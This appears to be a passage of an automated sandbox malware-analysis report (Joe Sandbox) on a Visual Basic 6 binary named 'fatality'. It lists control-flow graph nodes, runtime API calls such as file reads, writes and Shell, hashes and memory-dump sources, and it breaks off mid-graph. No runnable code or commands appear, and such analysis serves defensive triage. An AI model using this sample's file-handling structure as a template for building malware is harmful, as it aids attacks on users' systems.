call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove #517 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove #517 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove #517 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList call 4125a0 276->278 277->278 304 4087e7-40885d __vbaOnError #669 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaStrCopy __vbaStrCmp 278->304 305 4088bb-4088d6 __vbaStrCmp 304->305 306 40885f-4088b6 call 418c90 * 2 __vbaEnd 304->306 308 408979-408994 __vbaStrCmp 305->308 309 4088dc-4088f5 call 4125a0 305->309 310 408a32-408c4f __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove #517 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 306->310 308->310 311 40899a-4089b3 call 4125a0 308->311 321 408937-408974 #600 __vbaEnd 309->321 322 4088f7-408931 call 40fba0 call 415660 #580 309->322 325 4089f5-408a2c #600 __vbaEnd 311->325 326 4089b5-4089ef call 40fba0 call 415660 #580 311->326 321->310 322->321 325->310 326->325
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6), ref: 00407A6E
                                                                                                                                                            • __vbaNew2.MSVBVM60(004055D8,0041B8D8,?,?,?,?,004025E6), ref: 00407AC6
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055C8,00000014), ref: 00407B2C
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055E8,00000068), ref: 00407B8C
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 00407BB5
                                                                                                                                                            • __vbaEnd.MSVBVM60 ref: 00407BCD
                                                                                                                                                            • __vbaNew2.MSVBVM60(004055D8,0041B8D8), ref: 00407BED
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055C8,00000014), ref: 00407C53
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055E8,0000007C), ref: 00407CAE
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 00407CC9
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004053E4,000001BC), ref: 00407D0D
                                                                                                                                                            • __vbaNew2.MSVBVM60(004055D8,0041B8D8), ref: 00407D3F
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004055C8,00000014), ref: 00407DA5
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055E8,00000050), ref: 00407E02
                                                                                                                                                            • #618.MSVBVM60(?,00000001), ref: 00407E20
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00407E2B
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(004055FC,00000000), ref: 00407E37
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00407E55
                                                                                                                                                            • __vbaFreeObj.MSVBVM60(?,?,004025E6), ref: 00407E61
                                                                                                                                                            • __vbaNew2.MSVBVM60(004055D8,0041B8D8,?,?,004025E6), ref: 00407E90
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055C8,00000014), ref: 00407EF6
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055E8,00000050), ref: 00407F53
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00407F84
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 00407F8D
                                                                                                                                                            • __vbaNew2.MSVBVM60(004055D8,0041B8D8,?,?,004025E6), ref: 00407FB2
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055C8,00000014), ref: 00408018
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055E8,00000050), ref: 00408075
                                                                                                                                                            • __vbaStrCat.MSVBVM60(004055FC,?), ref: 00408096
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004080A1
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 004080AA
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 004080B3
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004080C8
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004080DC
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004080E9
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004080F9
                                                                                                                                                            • __vbaNew2.MSVBVM60(004055D8,0041B8D8,?,?,?,?,?,004025E6), ref: 0040811C
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055C8,00000014), ref: 00408182
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055E8,00000058), ref: 004081DF
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,?), ref: 004081FF
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040820A
                                                                                                                                                            • __vbaStrCat.MSVBVM60(004057CC,00000000), ref: 00408216
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408221
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040822F
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040823A
                                                                                                                                                            • #517.MSVBVM60(00000000), ref: 00408241
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040824C
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408259
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 00408275
                                                                                                                                                            • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 00408281
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 00408296
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 004082AA
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 004082B7
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 004082C7
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 004082DF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 004082F3
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 00408300
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408310
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408328
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00408343
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 0040834A
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408355
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408362
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00408376
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040838E
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 004083A8
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 004083AF
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004083BA
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004083C7
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004083DB
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004083F3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00408407
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408414
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408424
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040843C
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00408457
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 0040845E
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408469
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408476
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040848A
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004084A2
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 004084BD
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 004084C4
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004084CF
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004084DC
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004084F0
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408508
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 0040851C
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408529
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408539
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408556
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408561
                                                                                                                                                            • __vbaStrCat.MSVBVM60(004057CC,00000000), ref: 0040856D
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408578
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408586
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408591
                                                                                                                                                            • #517.MSVBVM60(00000000), ref: 00408598
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004085A3
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004085B0
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 004085C8
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004085E0
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004085F4
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408601
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408611
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040862F
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040863A
                                                                                                                                                            • __vbaStrCat.MSVBVM60(004057CC,00000000), ref: 00408646
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408651
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040865E
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408669
                                                                                                                                                            • #517.MSVBVM60(00000000), ref: 00408670
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040867B
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408688
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 004086A0
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004086B8
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 004086D3
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 004086DA
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004086E5
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004086F2
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00408706
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040871E
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00408739
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 00408740
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040874B
                                                                                                                                                            • #517.MSVBVM60(00000000), ref: 00408752
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040875D
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040876A
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 00408782
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040879A
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004087AE
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004087BB
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004087CB
                                                                                                                                                              • Part of subcall function 004125A0: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,004087E7,00000000), ref: 004125BE
                                                                                                                                                              • Part of subcall function 004125A0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004125EB
                                                                                                                                                              • Part of subcall function 004125A0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004125FA
                                                                                                                                                              • Part of subcall function 004125A0: #648.MSVBVM60(0000000A), ref: 00412619
                                                                                                                                                              • Part of subcall function 004125A0: __vbaFreeVar.MSVBVM60 ref: 00412628
                                                                                                                                                              • Part of subcall function 004125A0: __vbaI2I4.MSVBVM60(?), ref: 0041263C
                                                                                                                                                              • Part of subcall function 004125A0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041264A
                                                                                                                                                              • Part of subcall function 004125A0: __vbaI2I4.MSVBVM60 ref: 0041265A
                                                                                                                                                              • Part of subcall function 004125A0: #570.MSVBVM60(00000000), ref: 00412661
                                                                                                                                                              • Part of subcall function 004125A0: __vbaLenBstr.MSVBVM60(00404B24), ref: 0041266E
                                                                                                                                                              • Part of subcall function 004125A0: __vbaLenBstr.MSVBVM60(00404B24), ref: 004126A5
                                                                                                                                                              • Part of subcall function 004125A0: #525.MSVBVM60(00000000), ref: 004126AC
                                                                                                                                                              • Part of subcall function 004125A0: __vbaStrMove.MSVBVM60 ref: 004126B7
                                                                                                                                                              • Part of subcall function 004125A0: __vbaI2I4.MSVBVM60 ref: 004126C7
                                                                                                                                                              • Part of subcall function 004125A0: __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004126D2
                                                                                                                                                              • Part of subcall function 004125A0: __vbaI2I4.MSVBVM60 ref: 004126E2
                                                                                                                                                              • Part of subcall function 004125A0: __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004126EF
                                                                                                                                                              • Part of subcall function 004125A0: __vbaStrMove.MSVBVM60(?), ref: 0041270A
                                                                                                                                                              • Part of subcall function 004125A0: __vbaStrCopy.MSVBVM60 ref: 00412728
                                                                                                                                                              • Part of subcall function 004125A0: __vbaStrMove.MSVBVM60(00000003), ref: 00412739
                                                                                                                                                              • Part of subcall function 004125A0: #616.MSVBVM60(00000000), ref: 00412740
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,00000000), ref: 004087F5
                                                                                                                                                            • #669.MSVBVM60 ref: 00408802
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040880D
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040881A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00408823
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040883C
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00405B3C,?), ref: 00408855
                                                                                                                                                            • __vbaEnd.MSVBVM60(80000002,00000000,00000000,00000000,80000002,00000000,00000000,00000000), ref: 004088B0
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00405E88,?), ref: 004088CE
                                                                                                                                                            • #580.MSVBVM60(00000000,00000027,00000000,00000000,0041B078,00000000), ref: 00408931
                                                                                                                                                            • #600.MSVBVM60(00004008,00000000,00000000), ref: 0040895B
                                                                                                                                                            • __vbaEnd.MSVBVM60 ref: 0040896E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408A41
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00408A5B
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 00408A62
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408A6D
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408A7A
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00408A8E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408AA6
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00408AC1
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 00408AC8
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408AD3
                                                                                                                                                            • #517.MSVBVM60(00000000), ref: 00408ADA
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408AE5
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408AF2
                                                                                                                                                              • Part of subcall function 00418C90: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409F3C,80000002,00000000), ref: 00418CAE
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CDB
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CE7
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CF3
                                                                                                                                                              • Part of subcall function 00418C90: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00418D02
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6), ref: 00418D1B
                                                                                                                                                              • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004025E6), ref: 00418D2B
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D39
                                                                                                                                                              • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418D42
                                                                                                                                                              • Part of subcall function 00418C90: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418D53
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004025E6), ref: 00418D62
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004025E6), ref: 00418D75
                                                                                                                                                              • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004025E6), ref: 00418D85
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D93
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418DA1
                                                                                                                                                              • Part of subcall function 00418C90: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004025E6), ref: 00418DB1
                                                                                                                                                              • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(?,?,00000000,004025E6), ref: 00418DCA
                                                                                                                                                              • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(00418E07,?,00000000,004025E6), ref: 00418DEE
                                                                                                                                                              • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418DF7
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 00408B0A
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408B22
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00408B36
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408B43
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408B53
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408B6B
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00408B7F
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408B8C
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408B9C
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408BB4
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00408BC8
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408BD5
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408BE5
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408BFD
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00408C11
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408C1E
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408C2E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408C46
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Copy$Free$List$CheckHresult$ErrorNew2$#517$Bstr$#516#631AnsiChkstkSystemUnicode$File$#525#537#570#580#600#616#618#648#669Get3OpenSeek
                                                                                                                                                            • String ID: ;$MGH+$2
                                                                                                                                                            • API String ID: 2419524798-2363849171
                                                                                                                                                            • Opcode ID: 4922fd86914f0d1911d26fd6260cb31160d45723a23d8febec2101ce13e3e991
                                                                                                                                                            • Instruction ID: 93bf0c189370be62b4749cd89f90093835801c62d3816994bc11815577fef7f0
                                                                                                                                                            • Opcode Fuzzy Hash: 4922fd86914f0d1911d26fd6260cb31160d45723a23d8febec2101ce13e3e991
                                                                                                                                                            • Instruction Fuzzy Hash: 59B2FB71900218EFDB14DFA0DD48BEEBBB5FB48305F10816AE206B72A4DB745A85CF59
                                                                                                                                                            Function 00411590 Relevance: 161.5, APIs: 91, Strings: 1, Instructions: 456COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 343 411590-41167e __vbaChkstk __vbaStrCopy * 3 __vbaOnError #648 __vbaFreeVar __vbaI2I4 __vbaFileOpen __vbaI2I4 #570 __vbaLenBstr 344 411684-411687 343->344 345 411cff-411d05 __vbaErrorOverflow 343->345 344->345 346 41168d-41169b 344->346 347 4116a1-411770 __vbaLenBstr #525 __vbaStrMove __vbaI2I4 __vbaFileSeek __vbaI2I4 __vbaGet3 __vbaStrCopy call 40ee70 __vbaStrMove call 40ee70 __vbaStrMove __vbaStrCmp __vbaFreeStrList 346->347 348 41179f-4117b6 __vbaI2I4 __vbaFileClose 346->348 355 411781-411798 __vbaI2I4 __vbaFileClose 347->355 356 411772-4117c8 347->356 350 411c91-411ce7 __vbaFreeStr * 5 348->350 355->350 356->345 359 4117ce-411816 __vbaI2I4 __vbaFileSeek __vbaI2I4 __vbaGet3 356->359 359->345 360 41181c-41181f 359->360 360->345 361 411825-4118d3 __vbaI2I4 __vbaFileSeek call 40fba0 #648 __vbaFreeVar __vbaI2I4 __vbaFileOpen #525 __vbaStrMove 360->361 364 4118d9-4118e6 361->364 365 4119d6-411acb __vbaI2I4 __vbaFileClose call 40fba0 #648 __vbaFreeVar __vbaI2I4 __vbaFileOpen __vbaI2I4 __vbaFileClose #580 __vbaI2I4 __vbaFileOpen #525 __vbaStrMove 364->365 366 4118ec-4118f9 364->366 374 411ad1-411ade 365->374 366->345 367 4118ff-411905 366->367 369 411907-411951 __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 367->369 370 41195c-411969 367->370 369->345 372 411957-41195a 369->372 370->345 373 41196f-411972 370->373 375 4119d1 372->375 373->345 376 411978-4119cb #525 __vbaStrMove __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 373->376 377 411ae4-411af1 374->377 378 411bdb-411c8b __vbaI2I4 __vbaFileClose __vbaI2I4 __vbaFileClose __vbaStrCat __vbaStrMove __vbaStrCat #600 __vbaFreeStr __vbaFreeVar #600 374->378 375->364 376->375 377->345 379 411af7-411afd 377->379 378->350 380 411b54-411b61 379->380 381 411aff-411b49 __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 379->381 380->345 383 411b67-411b6a 380->383 381->345 382 411b4f-411b52 381->382 384 411bc9-411bd6 #598 382->384 383->345 385 